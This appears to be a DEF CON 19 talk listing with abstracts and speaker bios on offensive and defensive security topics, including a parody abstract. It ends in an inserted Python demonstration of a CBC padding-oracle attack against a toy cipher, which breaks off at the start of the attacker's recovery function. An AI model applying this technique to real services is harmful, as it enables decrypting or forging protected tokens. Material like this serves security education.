When Space Elephants Attack: A DEFCON Challenge for Database Geeks

The Schemaverse is a vast universe found purely within a PostgreSQL database. Control your fleet of ships manually with SQL commands or write AI in PL/pgSQL so they control themselves while you sit back and enjoy the con. This presentation will help my fellow database geeks to understand the game play mechanics used in The Schemaverse so they can compete in the weekend long tournament.



Abstrct, the author of The Schemaverse game, is a hobbyist programmer and data aficionado. While not pretending to have much actual experience with database security in the professional world, he has enjoyed making database systems do ridiculous things since his first SELECT.


Bosses love Excel, Hackers too.

Remote applications published by companies are all around us in the cloud. In this talk we are going to add ICA and Terminal Server apps to the fingerprinting process, automating data analysis using FOCA. This will allow an attacker to fingerprint internal software and internal networks and to combine that information with PTR scanning, evilgrade attacks and command execution through Excel files. In the end, we are going to play with a tricky feature in the security policies for remote Excel that allows hackers to bypass macro restrictions.



Chema Alonso is a Security Consultant with Informatica64, a Madrid-based security firm. Chema holds Computer Science and System Engineering degrees from Rey Juan Carlos University and Universidad Politécnica de Madrid, respectively. During his more than six years as a security professional, he has consistently been recognized as a Microsoft Most Valuable Professional (MVP). Chema is a frequent speaker at industry events (Microsoft Technet / Security Tour, AseguraIT) and has been invited to present at information security conferences worldwide including Black Hat Briefings, Defcon, Ekoparty and RootedCon. He is a frequent contributor to several technical magazines in Spain, where he writes about state-of-the-art attack and defense mechanisms, web security, general ethical hacking techniques and FOCA, the metadata extraction tool which he co-authors.

Twitter: @chemaalonso



Juan Garrido "Silverhack" is a forensics professional who has been working as a security consultant for the last seven years. He is the author of two books about forensic analysis in Windows environments and currently works as a security consultant at Informatica 64.


Dust: Your Feed RSS Belongs To You! Avoid Censorship!

Laws around the world are trying to control what is published on the Internet. After the WikiLeaks case and the HBGary ownage, everybody could see that there are many controls that can be used to close a website or a domain name and to cut the communication between the source and the audience. What happens if someone wants to close your blog? Could you send any message to your audience? In this talk we present a new way to publish your RSS feeds using P2P networks as a failover system. Dust is "only" a reader, but it can manage P2P feeds and multiple HTTP feeds from the same source, and, its most important feature, it can migrate from one feed to multiple ones without any effort for your subscribers.



Chema Alonso is a Security Consultant with Informatica64, a Madrid-based security firm. Chema holds Computer Science and System Engineering degrees from Rey Juan Carlos University and Universidad Politécnica de Madrid, respectively. During his more than six years as a security professional, he has consistently been recognized as a Microsoft Most Valuable Professional (MVP). Chema is a frequent speaker at industry events (Microsoft Technet / Security Tour, AseguraIT) and has been invited to present at information security conferences worldwide including Black Hat Briefings, Defcon, Ekoparty and RootedCon. He is a frequent contributor to several technical magazines in Spain, where he writes about state-of-the-art attack and defense mechanisms, web security, general ethical hacking techniques and FOCA, the metadata extraction tool which he co-authors.

Twitter: @chemaalonso



Juan Garrido "Silverhack" is a forensics professional who has been working as a security consultant for the last seven years. He is the author of two books about forensic analysis in Windows environments and currently works as a security consultant at Informatica 64.


IP4 TRUTH: The IPocalypse is a LIE

There is a long tradition of researchers presenting at security conferences on topics that are embarrassing to a large company or government agency: ATM hacking, router vulnerabilities, Massachusetts toll road RFIDs, etc. Many of these brave researchers risk lawsuits or career ruin to reveal the truth. THIS is the first talk that puts the presenters' very lives in peril. Much has been made of the so-called "IPv4 address exhaustion" problem, also known as the IPocalypse. Industry analysts, networking vendors, regulatory groups, think-tanks, and so on have insisted that migration to IPv6 is the only solution. However, a small group of dissenters insist that the threat is exaggerated and, more importantly, that the "migration plan" is merely a scheme to increase revenue for the network equipment manufacturers and overpriced consultants.



The full truth is that IPv6 is the result of an international cabal on the verge of controlling the world. For centuries, mystics have prophesied that this "migration" would be the cabal's turning point. Incontrovertible evidence will be presented to convince all in attendance. Numerological analysis, ancient texts, and intercepted communiqués are just a few examples. Due to threats against their families, the presenters have been forced to take on assumed identities and appear only in disguise.



Sterling Archer, codename "Duchess", is the world's most deadly secret agent, master of the honeypot operation, and inventor of the tactical turtleneck. He has been an ISIS field agent for 14 years and is in the DANGER ZONE.



Twitter: @s__archer



Prof. Hubert Freaksworth's bio is somewhere. Everything's like somewhere. Currently this bio is free form. All of this fitting in this machine is seriously freaked up.


Security When Nano Seconds Count

There's a brave new frontier for IT Security: a place where "best practices" do not even contemplate the inclusion of a firewall in the network. This frontier is found in the most unlikely of places, where it is presumed that IT Security is a mature practice: banks, financial institutions and insurance companies. High Speed Trading, High Frequency Trading, Low Latency Trading, Algorithmic Trading -- all words for electronic trades committed in microseconds without the intervention of humans. There are no firewalls, everything is custom and none of it is secure. It's SkyNet for Money and it's happening now.



Speaker, CISA, is Principal at Push The Stack Consulting, providing security consulting services to the utility and financial verticals. He has been involved with implementing a practical level of information security in Fortune 500, TSE 100, and major public-sector organizations for more than 15 years. James is also a contributing analyst with Securosis, founder of the think|haus hackerspace and has a recurring column on Liquidmatrix Security Digest. Best described as: "Infosec geek, hacker, social activist, author, speaker, and parent." His areas of interest include organizational change, social engineering, blinky lights and shiny things.



Twitter: @myrcurial


Beat to 1337: Creating A Successful University Cyber Defense Organization

A university with no prior CTF experience and no students with significant prior information security experience may find competition a daunting task. Most competitions require a large amount of technical knowledge to set up, along with a fair amount of organization. But how are students with no information security knowledge going to compete in CTF competitions and keep from getting completely owned? Well, the answer is, they're not. The most important step to successful competition is educating oneself.



In this presentation, we describe our efforts as a team of undergraduate students interested in creating our school's cyber defense organization and beginning to participate in CTF competitions. We introduce the methodologies that we used (and continue to use) in order to start educating and motivating bright students about information security and keep them interested.



We will use our personal experience and proven successful tactics to outline the necessary steps to take and to expose the commonly overlooked necessities of starting a cyber defense organization, regardless of whether you are a student interested in information security, an advisor looking to motivate students, an alumnus looking to share your passion for information security, etc.



Information security education must continue outside the classroom. Although the demand for information security knowledge is high, the requirements are rigid. While the industry is growing very rapidly, students who do not show passion and dedication to the field, along with deep practical knowledge, will be quickly left behind. We aim to leave you armed and ready to compete with and learn from some of the best and brightest information security students in the world.



Mike Arpaia is a Junior in the CyberSecurity program at Stevens Institute of Technology and is a co-founder of the Stevens Cyber Defense Team. Mike works as a Security Consultant/Penetration Tester Intern at Gotham Digital Science LLC. His primary interests are in web application security and exploitation.



Ted Reed was a student interested in cyber-security. Now he likes model planes and simulation.


Pillaging DVCS Repos For Fun And Profit

Distributed Version Control Systems, like git, are becoming an increasingly popular way to deploy web applications and web-related resources. Our research shows these repositories commonly contain information very useful to an attacker. This talk, which was part of my small contribution to the Penetration Testing Execution Standard (PTES), will demonstrate how to identify these repositories and techniques to pillage as much information as possible from them. Lastly, a toolkit will be released to automate the discussed techniques, supporting git, hg and bzr repositories!



Adam Baldwin has over 10 years of mostly self-taught computer security experience and currently is the co-founder and Chief Pwning Officer at nGenuity, focusing on security of web applications. He at one time possessed a GCIA and, if his CPEs are up to date, should still have a CISSP. Prior to starting nGenuity Adam worked for Symantec. Adam is a minor contributor to the W3AF project and has previously spoken at Toorcamp, DjangoCon 2010, and JSConf 2011.


Chip & PIN is Definitely Broken

The EMV global standard for electronic payments is widely used for interoperation between chip-equipped credit/debit cards, Point of Sale (POS) devices and ATMs.



Following the trail of the serious vulnerabilities published by Murdoch and Drimer's team at Cambridge University regarding the usage of stolen cards, we explore the feasibility of skimming and cloning in the context of POS usage.



We will analyze in detail EMV flaws in PIN protection and illustrate skimming prototypes that can be covertly used to harvest credit card information as well as PIN numbers regardless of the type/configuration of the card.



The attacks are believed to be unreleased so far to the public (which however does not mean fraudsters are not exploiting them) and are effective in bypassing existing protections and modes of operation.



As usual cool gear and videos are going to be featured in order to maximize the presentation.


Deceptive Hacking: How Misdirection Can Be Used To Steal Information Without Being Detected

There are many similarities between professional hackers and professional magicians. Magicians are experts in creating deception, and these skills can be applied when penetrating a network. The author, with 30 years of experience in both security and magic, will explain the basic principles and theories that magicians use to create illusions. This includes definitions of magic terms such as gaff, gimmick, fake, stooge, feint, sleight, bluff, timing, and different types of misdirection. It will be shown that all of these techniques apply to hacking as well. A scenario is presented where normal hacking techniques would be detected and information theft is prevented. The only solution is to use deception and trickery.



Bruce "Grymoire" Barnett has been a scientist at a large Fortune 50 company for 25 years, with a focus on security and advanced algorithms. Some of the tools, developed for military contractors, dealt with attack trees and vulnerability chains (NOOSE – Networked Object-Oriented Security Examiner). Other projects include data provenance, steganography, key management algorithms for sensor networks, and advanced network analysis. He has also written several tutorials on Unix shell scripting, and Google ranks his Sed tutorial as #1. Bruce has been a part-time professional magician for 35 years, and belongs to societies such as the International Brotherhood of Magicians and the Society of American Magicians. He currently runs several forums exclusively for magicians, such as the Electronic Grymoire and the Shadow Network.

Twitter: @grymoire

Facebook: http://www.facebook.com/home.php#!/profile.php?id=1593769945&v=info


Fingerbank — Open DHCP Fingerprints Database

The presentation will first take a step back and offer a basic reminder of what passive fingerprinting is and, more precisely, DHCP fingerprinting. Then we will offer defensive and offensive use cases for DHCP fingerprinting. Next, we will cover the goals and resources offered by the new project and some future plans. As part of the announcement, two large fingerprint databases will be made available (both of which were bundled in separate projects: PacketFence and Satori).



We hope this new resource will increase the quality and breadth of current DHCP fingerprint databases and increase adoption for this reliable fingerprinting technique.



Olivier Bilodeau is a System Architect at Inverse, developing PacketFence, an open source Network Access Control (NAC) software. He also lectures on system security at École de technologie supérieure (ETS) in Montreal, Canada. His past experiences have taken him into dusty Unix server rooms, obfuscated Perl code and expensive enterprise networks. In his free time he enjoys several CTFs a year (with the CISSP Groupies and Amish Security teams), hacking Perl, doing open source development and brewing beer. You can read his occasional blog posts at: http://www.bottomlesspit.org/

Twitter: @packetfence


PacketFence, The Open Source NAC: What We've Done In The Last Two Years

Ever heard of PacketFence? It's a free and open source Network Access Control (NAC) software that's been out there since 2005. In the last two years we had several major releases with important new features that make it an even more compelling solution.



Trying to appeal to both attackers and defenders, this presentation will cover all of our NAC's secret sauce: wired / wireless RADIUS MAC authentication / 802.1X, port security through SNMP, captive portal redirection techniques, hardware support procedure, voice over IP, FreeRADIUS, Snort and Nessus integration, and quarantine / remediation features. We will continue with the advantages of Open Source when dealing with a NAC. Then we will focus on the last two years of the project: the problems, the missteps and the good, new and shiny stuff. This will include learning about some 802.1X problems, complaining about other vendors' code, looking at our own problems and salivating over some of the technical prowess we recently achieved. Finally we will expose our World Domination Roadmap covering both short-term improvements and potential research projects (and we will beg for help to achieve it).



Hopefully this talk will demystify NACs by explaining in detail how our implementation works, give yet another example of why open source rocks and convince those who haven't jumped on the NAC bandwagon to give the free one a try.



Olivier Bilodeau is a System Architect at Inverse, developing PacketFence, an open source Network Access Control (NAC) software. He also lectures on system security at École de technologie supérieure (ETS) in Montreal, Canada. His past experiences have taken him into dusty Unix server rooms, obfuscated Perl code and expensive enterprise networks. In his free time he enjoys several CTFs a year (with the CISSP Groupies and Amish Security teams), hacking Perl, doing open source development and brewing beer. You can read his occasional blog posts at: http://www.bottomlesspit.org/

Twitter: @packetfence


Federation and Empire

Federated Identity is becoming prevalent in corporate environments. True, solving cross-domain access control to Web applications or services is a nagging issue. Today, unsatisfying traditional approaches based on duplicated user accounts or dangerous trust domain relationships are being replaced by neater solutions. One of them is getting more and more popular not only in academic but in corporate environments as well: claims-based authorization relying on SAML tokens. This cross-domain federated Web SSO solution allows applications or service providers to finely control their access while leaving the burden of user management to their authoritative domains. Authoritative domains also keep full control over what they disclose about their users: very attractive. However, most existing material explains to developers how to leverage this technology while keeping them oblivious to the underlying protocols or the (many) standards' complexity and intricacies. By taking a radically low-level, API-free approach, this talk is intended for security pen-testers or architects who have to cope with SAML-based access control. Only the necessary presentation of the standards involved will be given. Then the two main parts will focus on how to adapt existing toolsets to be fully operational against SAML access control, and on key aspects that need to be considered prior to joining or creating such a federation. Most of the points are implementation agnostic and can be applied to Shibboleth, SimpleSAMLphp or Active Directory Federation Services, for instance. Likewise, the presented tools are Burp Pro extensions leveraging the Buby framework but can easily be translated into everyone's preferred toolset.



Emmanuel Bouillon has been working in the Information Security field for more than a decade. Most of these years were spent as an InfoSec expert within the French Atomic Energy Commission, where he was in charge of a technical team dedicated to information security. Among its missions were incident handling, vulnerability assessment and penetration testing. Since 2009, Emmanuel Bouillon has lived in the Netherlands, working for an international organization as a Senior Information Assurance Scientist. His work is mainly focused on Cyber Defense issues. Emmanuel Bouillon has been a speaker at international conferences like PacSec, BlackHat, Hack.lu and #days, has written several articles in IT/Security magazines and was a teacher of network and system security in various French postgraduate schools. He holds a renewed ISO/CEI 27001:2005 Auditor certification and is credited for several responsibly disclosed vulnerabilities (CVE-2010-{0283,2229,2914,2941}, CVE-2011-{0001,...}).


Three Generations of DoS Attacks (with Audience Participation, as Victims)

Denial-of-service (DoS) attacks are very common. They are used for extortion, political protest, revenge, or just LULz. Most of them use old, inefficient methods like UDP floods, which require thousands of attackers to bring down a Web server. The newer Layer 7 attacks like Slowloris and RUDY are more powerful, and can stop a Web server from a single attacker with incomplete HTTP requests. The newest and most powerful attack uses IPv6 multicasts, and can bring down all the Windows machines on an entire network from a single attacker.



I will explain and demonstrate these tools: Low Orbit Ion Cannon, OWASP HTTP DoS Tool, and flood_router6 from the thc-ipv6 attack suite. This deadly IPv6 Router Advertisement Flood attack is a zero-day attack: Microsoft has known about it since June 2010 but has not patched it yet (as of May 4, 2011).



Audience Participation: Bring a device to test for vulnerability to the Router Advertisement Flood! Some cell phones and game consoles have been reported to be vulnerable; let's find out! If your device crashes, please come to the Q&A room so we can video-record it and arrange disclosure to the vendor.



Sam Bowne has been teaching computer networking and security classes at CCSF since 2000. He has given talks at DEFCON, Toorcon and BayThreat, and taught classes and seminars at many other schools and teaching conferences.



Sam has a B.S. in Physics from Edinboro University of Pennsylvania and a Ph.D. in Physics from University of Illinois, Urbana-Champaign. His Industry Certifications are: Associate of (ISC)^2, Certified Ethical Hacker, Microsoft: MCP, MCDST, MCTS: Vista; Network+, Security+, Hurricane Electric IPv6 Guru, CCENT.

Twitter: @sambowne


Building The DEF CON Network, Making A Sandbox For 10,000 Hackers

We will cover how the DEF CON network team builds a network from scratch, in three days, with very little budget: how this network evolved, what worked for us, and what didn't work over the last ten years. This network started as an idea and, after acquiring some kick-butt hardware, has allowed us to support several thousand users concurrently. In addition, I will cover the new WPA2 Enterprise deployment, what worked and what didn't, and how the DEF CON team has made the Rio network rock!



David M. N. Bryan has 10 years of computer security experience, including pentesting, consulting, engineering, and administration. As an active participant in the information security community, he volunteers at DEF CON, where he designs and implements the firewall and network for what is said to be the most hostile network environment in the world. This network allows speakers, press, vendors, and others to gain access to the Internet, without being hacked. In his spare time he runs the local DEF CON group, DC612, is the president of Twincities Makers group, and participates in the Minneapolis OWASP chapter.



Twitter: @videoman



Luiz Eduardo is the Director of SpiderLabs Latin America Countries. With almost 20 years of experience, throughout his career he has worked with possibly all types of networking technologies on the enterprise and service provider sectors, as well as the security involved in these technologies.



Luiz is the founder of the y0u Sh0t the Sheriff security conference held in Brazil and has worked on the wireless infrastructure of Blackhat, DEF CON, Computer Chaos Congress and Shmoocon. As a public speaker, he has given presentations on diverse infosec topics worldwide at conferences such as DEF CON, FIRST, H2HC, HitB Malaysia, Layerone, ShmooCon, BlueHat, ThotCon, Toorcon and others. Luiz holds the following certifications: CWNE, CISSP, GISP, GCIH and CEH.


Kinectasploit: Metasploit Meets Kinect

We've all seen hackers in movies flying through 3D worlds as they hack the Gibson. How about trying it for real? Now that we've got the Kinect, let's hook it up to some hacking tools and see what it looks like to hack via Kinect!



Jeff Bryner has 20 years of experience integrating systems, fixing security issues, performing incident response and forensics. He writes for the SANS forensic blog, has spoken at RSA on SCADA security issues and at DEFCON 18 on the Google Toolbar, and runs p0wnlabs.com just for fun.

Twitter: @p0wnlabs


Physical Memory Forensics for Cache

Physical memory forensics has gained a lot of traction over the past five or six years. While it will never eliminate the need for disk forensics, memory analysis has proven its efficacy during incident response and more traditional forensic investigations. Previously, memory forensics, although useful, focused on a process' address space in the form of Virtual Address Descriptors (VADs) but ignored other rich sources of information. In the past, some techniques of process reconstitution have been auspicious at best and erroneous at worst. This presentation will build upon lessons learned and propose more thorough ways to reconstruct process contents, and therefore a process' address space. By using the methods presented, it will be possible to further reduce the data you care about in an incident response or forensic investigation and to better apply the traditional computer security techniques such as reverse engineering, hash matching, and byte pattern or signature matching such as those provided by ClamAV and VxClass.



Jamie Butler: Bio to come.


Metasploit vSploit Modules

This talk is for security practitioners who are responsible for and need to test enterprise network security solutions. Marcus Carey, David Rude, and Will Vandevanter discuss how to use the Metasploit Framework beyond penetration testing to validate whether security solutions are working as expected. Marcus initiated the creation of vSploit auxiliary modules that emulate real-world network attacks. These can be used for good and evil purposes. This talk will debut several Metasploit modules designed specifically for testing firewalls, IDS, IPS, and DLP solutions. This presentation will show how to emulate persistent network attacks with vSploit modules, which can come in handy if you are a penetration tester.



Marcus J. Carey is the Enterprise Security Community Manager at Rapid7. Marcus has over 17 years of information assurance experience working in the DoD as well as Federal and State Government organizations. Marcus holds an M.S. in Network Security from Capitol College as well as several security-related certifications.

Twitter: @ifail



David Rude is a Metasploit Exploit Developer at Rapid7. David writes code that executes code. David has worked for years as a professional security researcher. He has a fascination with finding and exploiting vulnerabilities. At Rapid7, David currently works as a developer who writes exploits and codes awesomeness for Metasploit Framework, Metasploit Express, and Metasploit Pro.

Twitter: @msfbannedit



Will Vandevanter is a senior penetration tester at Rapid7. His focus interests include web application security, DoS attacks, and secure code. He has a Master's degree in Computer Science (focus in Secure Software Engineering) and a BSc with joint majors in Computer Science and Mathematics.

Twitter: @willis__


Lives On The Line: Securing Crisis Maps In Libya, Sudan, And Pakistan

Crisis maps collect and present open source intelligence (Twitter, Facebook, YouTube, news reports) and direct messages (SMS, email) during disasters such as the Haiti earthquake and civil unrest in Africa. The deployment of crisis mapping technology is on its way to becoming a standard tool to collect and track ground truth from crisis zones, but very little work has been done to evaluate and mitigate the threat posed by adversaries with offensive infosec capabilities. These platforms can provide responders and humanitarian organizations with the timely, high-fidelity situational awareness necessary to direct aid and save lives. Unfortunately, they can also provide hostile national security services and other malicious groups with the information they need to target vulnerable populations, hunt down individuals, and manipulate response operations. In this session we'll set up, operate, attack and defend an online crisis map. Bring your laptop and toolsets because you will have the opportunity to play the bad actor (a technical member of the secret police or terrorist organization) as well as the defender (the response agency, citizen on the ground, and sysadmin trying to keep the server online). The experience will bring together everything we know and love and hate about defending online systems, including buggy code, naive users, and security vs. usability tradeoffs, and do so in a situation where people are dying and the adversary controls the network. We'll also introduce some not-so-typical concepts like building trust on the fly, crowdsourced verification, and maintaining situational awareness from halfway around the globe. Each step in the process will be based on real-world deployment experiences monitoring everything from local riots to nation-wide revolutions and natural disasters.
The lessons learned, vulnerabilities found, and exploits developed during the session will be taken back to the crisis mapping community, enabling them to build more secure systems and more effective, life-saving deployments.



George Chamales has spent the last decade working in almost every legal permutation of employer / job the computer security field has to offer. His list of current and former government employers includes DOD, DOE, DHS, and DOI. In the private sector, he's worked as a security architect, member of the Honeynet Project, and corporate pen-tester targeting Fortune 500 companies. He is an active member of the crisis mapping community, where he develops new tools and capabilities, co-founded the Crisis Mappers Standby Task Force, and has served as the technical lead for numerous deployments including LibyaCrisisMap.net, Pakreport.org, and SudanVoteMonitor.com.


Abusing HTML5

The spike of i{Phone, Pod Touch, Pad}, Android, and other mobile devices that do not support Flash has spurred the growth of and interest in HTML5, even though the standard is still evolving. The power of HTML5 allows developers to create almost full-fledged web applications, not just structured content. HTML5's new features have increased the attack surface. It has been demonstrated that the HTML5 offline application cache can be abused. In addition, the support for client-side storage will open up the opportunity for SQL injection attacks on client machines. There has been chatter regarding the new attack opportunities that the <audio>, <video>, and <canvas> tags will present, considering they require JavaScript and image-related functions such as SVG. This presentation will demonstrate the issues of HTML5 and how they can be abused and mitigated with good old techniques. This presentation will also delve into writing malicious web pages with web workers, abusing cross-origin JavaScript requests, how not to do cross-document messaging, and abusing geolocation.



Ming Chow is a Lecturer at the Tufts University Department of Computer Science. His areas of interest are computer security, game development, web application security, and Computer Science in Education. He was also a web application developer for ten years at Harvard University for University Operations Services. Ming co-edited a special issue of IEEE Security & Privacy on securing online games with Gary McGraw of Cigital, Inc., published in May 2009. Ming is a frequent guest speaker and has spoken at numerous organizations, including the New England Chapter of the High Technology Crime Investigation Association (HTCIA-NE), the Greater Boston Chapter of the Association of Certified Fraud Examiners (ACFE), the Massachusetts Office of the Attorney General (AGO), and OWASP. Ming mentored a team of students from Tufts to the Microsoft Imagine Cup Game Design Competition US Finals in 2010. Finally, Ming is a SANS GIAC Certified Incident Handler (GCIH).

Twitter: @tufts_cs_mchow





return to top

Familiarity Breeds Contempt

"Good programmers write code, great programmers reuse" is one of the most well known truisms of software development. But what does that mean for security? For over 30 years software engineering has focused on writing the perfect code and reusing it as often as possible, believing that if they can just get the bugs out, the system will be secure. In our talk we will demonstrate how the most prominent doctrine of programming is deadly for security. Analysis of software vulnerability data, including a full decade of data for several versions of the most popular operating systems, server applications and user applications (both open and closed source), shows that properties extrinsic to the software play a much greater role in the rate of vulnerability discovery than do intrinsic properties such as the actual software quality. We show that (at least in the first phase of a product's existence), software vulnerabilities have different properties from software defects. Our analysis of attacker tools and popular exploits shows that the attacker's learning curve determines when and which particular products are likely to be attacked. Improvements in those tools affect the frequency of attack, and the ultimate result is point-and-click usability. We will present several examples from both the defender and the attacker perspective illustrating how dangerous familiarity is for security. We will demonstrate that the more familiar an attacker is with your product, the more likely you are to be attacked and the more likely an attacker will succeed.



Sandy Clark (Mouse) has been taking things apart since the age of two, and still hasn't learned to put them back together. An active member of the Hacker community, her professional work includes an Air Force Flight Control Computer, a simulator for NASA and singing at Carnegie Hall. She is currently fulfilling a childhood dream, pursuing a Ph.D. in Computer Systems and Security at the University of Pennsylvania.



Her research explores the vulnerability lifecycle, human scale security and the unexpected ways that systems interact. A founding member of Toool-USA, she also enjoys puzzles, toys, Mao (the card game), and anything that involves night vision goggles.



Brad Haines (RenderMan) is a Whitehat by trade, Blackhat by fashion. A very visible and well known member of the wardriving and hacker community, he does whatever he can to learn how things work, how to make them better and to teach people the same. He is a firm believer in the hacker ethic of openness, sharing, and collaboration. Never afraid to try something new, he can usually be found taking unnecessary risks for the sake of the experience.



Author of several computer security books and a frequent presenter at hacker, security and privacy conferences, he can usually be found investigating something interesting, scanning the air for any WiFi data, and trying to find new and interesting beers.

Twitter: @Ihackedwhat

return to top

Operational Use of Offensive Cyber

This session will discuss the "Art of the Possible" when it comes to "Offensive Cyber Operations" and why it is so important for both military and non-military cyber professionals to understand each other's perspectives on "Offensive Cyber Operations". Discussion will focus on the military's planning process, how the potential introduction of offensive cyber operations could affect that process, and why information-sharing events like DEFCON are so important to its eventual success.



Christopher Cleary is a former Computer Network Operations Planner from US CYBER COMMAND who led an Operational Planning Team focused on studying "Advanced Persistent Threats" to DoD networks. During his tenure at CYBERCOM he was one of the few Officers to lead a forward-deployed element supporting combat operations in the CENTCOM AOR. Mr. Cleary is currently employed by Sparta Inc. opa Cobham Analytic Solutions directing Cyber Strategy and Policy.

return to top

Look At What My Car Can Do

This presentation is an introduction to the new world of automobile communication, data and entertainment systems, highlighting the Ford Sync System.



The Ford Sync System is a remarkable technological advance that has changed the automobile industry. While hard drives have been used in automobile entertainment applications for some time now, the Ford Sync System is different. It allows the user to interact with the car's communication system in a brand new way. If a vehicle with the Ford Sync system is used to commit a crime or to hide data, how would examiners be able to determine what data might be contained in the Ford Sync System? How does it get there? What forensic process or type of exploitation can be used to determine what traces are left behind on the car's hard drive? This presentation will take the audience through the process of various methods of infilling, hiding, acquiring data, and conducting a forensic exam on the Ford Sync System.



Tyler Cohen is known in the digital forensic community for her work with forensics on alternate media devices and has given presentations at conferences all over the country on the topic, including the Defense Cybercrime Conference, High Tech Crime Investigation Association, Defcon, TechnoSecurity, Technoforensics, and the California District Attorney Association. She has co-authored a book entitled Alternate Data Storage Forensics (ISBN-13: 978-1-59749-163-1) and was featured in Best Damn Cybercrime and Digital Forensics Book Period (ISBN-13: 978-1-59749-228-7). She currently works for the Department of Defense. Prior to that she worked for General Dynamics, assigned to the Department of Defense Cyber Crime Center (DC3) where she was a lead digital forensic examiner. Here she used her expertise in intrusion analysis and major crimes to successfully complete digital forensic exams. Before joining DC3, she was employed at ISS/IBM as an emergency incident responder and forensic examiner where she also showcased her expertise in intrusion analysis, major crimes and PCI standards. Prior to that, she worked for NASA as a Computer Forensic Examiner under the computer crimes division for the Inspector General.

return to top

Kernel Exploitation Via Uninitialized Stack

Leveraging uninitialized stack memory into a full-blown root escalation is easier than it sounds. See how to find these vulnerabilities, avoid the pitfalls of priming the stack, and turn your "memory corruption" into full root privileges.



Kees Cook is part of the Ubuntu Security Team, where he tries to harden Ubuntu in particular, and Linux in general, against attack. In addition to being an Ubuntu developer, he's a member of the Ubuntu Technical Board, a Debian Developer, and a Kernel.org admin. As a long-time DEF CON Capture the Flag participant, he's especially proud of being part of Team 1@stPlace and winning in 2006 and 2007.



Twitter: @kees_cook

return to top

The Art and Science of Security Research

Research is a tricky thing, full of pitfalls, blind alleys, and rich rewards for the individual and humanity. This talk studies the art and science of conducting security research, from the genesis of your idea through experimentation and refinement to publication and beyond. In this talk you will learn how to generate and select powerful ideas, build upon the work of others, conduct groundbreaking work, and share your results for maximum desired effect. Whether you are a lone researcher or part of a large cabal you will take away ideas and techniques for maximizing the impact of your work, lest it lie dormant or someone else rediscover your idea several years later.



Greg Conti is an Academy Professor and Director of West Point's Cyber Security Research Center. He is the author of Security Data Visualization (No Starch Press) and Googling Security (Addison-Wesley) as well as over 40 articles and papers covering online privacy, usable security, security data visualization, and cyber warfare. His work can be found at www.gregconti.com and www.rumint.org.

return to top

Internet Kiosk Terminals : The Redux

Paul Craig is the self-proclaimed "King of Kiosk Hacking". You have likely heard of him or his pornographic tool iKAT (Interactive Kiosk Attack Tool). For the last 3 years he has dedicated his life to striking fear into the hearts of Kiosk vendors.



This talk will comprise all of his latest advancements in the field of hacking Kiosk terminals. Multiple platforms, vendors, technologies and more shells than you can shake a stick at. If you have ever wanted to hack that lonely web-browsing computer in the corner of a room, this is the talk for you.



This talk will also showcase a live freestyle Kiosk hacking session, with a truck load of slick ninja techniques and zero-day. Watch out — the King of Kiosk hacking is back in town.



Paul Craig works at Security-Assessment.com with some of the best hackers in the world.



Paul lives for hacking, it's in his blood! From the age of 13 he has been addicted to popping shells, stealing access and escalating privileges. He loves his job and is fully committed to the trade.

return to top

Cipherspaces/Darknets: An Overview Of Attack Strategies

Darknets/Cipherspaces such as Tor and I2P have been covered before in great detail. Sometimes it can be hard to follow attack strategies that have been used against them as the papers written on the topic have been academic and abstract. What this talk will attempt to do is step back and give an overview of the topic in a manner hopefully more conducive to the understanding of security practitioners, giving more concrete examples. While little to nothing in this talk will be "new and groundbreaking" it should lead to a better understanding of how encrypted anonymizing networks can be subverted to reveal identities.



Adrian Crenshaw has worked in the IT industry for the last thirteen years. He runs the information security website Irongeek.com, which specializes in videos and articles that illustrate how to use various pen-testing and security tools.

Twitter: @irongeek_adc

return to top

Speaking with Cryptographic Oracles

Cryptography is often used to secure data, but few people have a solid understanding of cryptography. It is often said that if you are not strictly a cryptographer, you will get cryptography wrong. For that matter, if you ARE a cryptographer, it is still easy to make mistakes. The algorithms might be peer reviewed and unbroken for 15 years, but if you use them incorrectly, they might leak information. Cryptographic oracles are systems which take user-controlled input and leak part or all of the output, generally leading to an attacker being able to defeat the cryptography, in part or in whole. In this talk, methods for finding and exploiting encryption, decryption, and padding oracles with minimal cryptographic knowledge will be discussed.
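The padding oracle named in the abstract, worked end to end as an added example (this is not the speaker's code or material from the talk). The server decrypts a CBC-mode token and reveals one bit per request: whether PKCS#7 padding checked out. The attacker never sees a key and never sees plaintext, yet recovers the token byte by byte at about 256 queries each. The block cipher is a 4-round Feistel network built on SHA-256 so the file runs on the Python standard library alone; it stands in for AES and is an assumption of this example, not of the talk. The attack depends only on CBC and on the padding check, so swapping in a real cipher changes nothing below `block_decrypt`. The sample token `SECRET` is constructed.

```python
import hashlib
import os

BLOCK = 16
SECRET = b"user=alice;role=admin;exp=1700000000"  # constructed sample session token


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, rnd, half):
    # Feistel F function: keyed, round-numbered hash truncated to half a block.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]

def block_encrypt(key, block):
    """4-round Feistel network, a stdlib stand-in for AES (assumption of this example)."""
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, rnd, right))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(key, rnd, left)), left
    return left + right

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the distinguishable failure the server leaks
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    padded, prev, out = pkcs7_pad(plaintext), iv, b""
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return iv + out  # IV travels in the clear ahead of the ciphertext

def cbc_decrypt(key, ciphertext):
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))
    return pkcs7_unpad(plain)


class LeakyServer:
    """Holds the key; answers only 'was the padding valid?'. A distinct error
    page, status code or timing difference is all an attacker needs."""

    def __init__(self, key):
        self.key, self.queries = key, 0

    def padding_ok(self, ciphertext):
        self.queries += 1
        try:
            cbc_decrypt(self.key, ciphertext)
            return True
        except ValueError:
            return False


def recover_plaintext(oracle, ciphertext):
    """Attacker side: decrypt with no key, using the oracle alone."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b""
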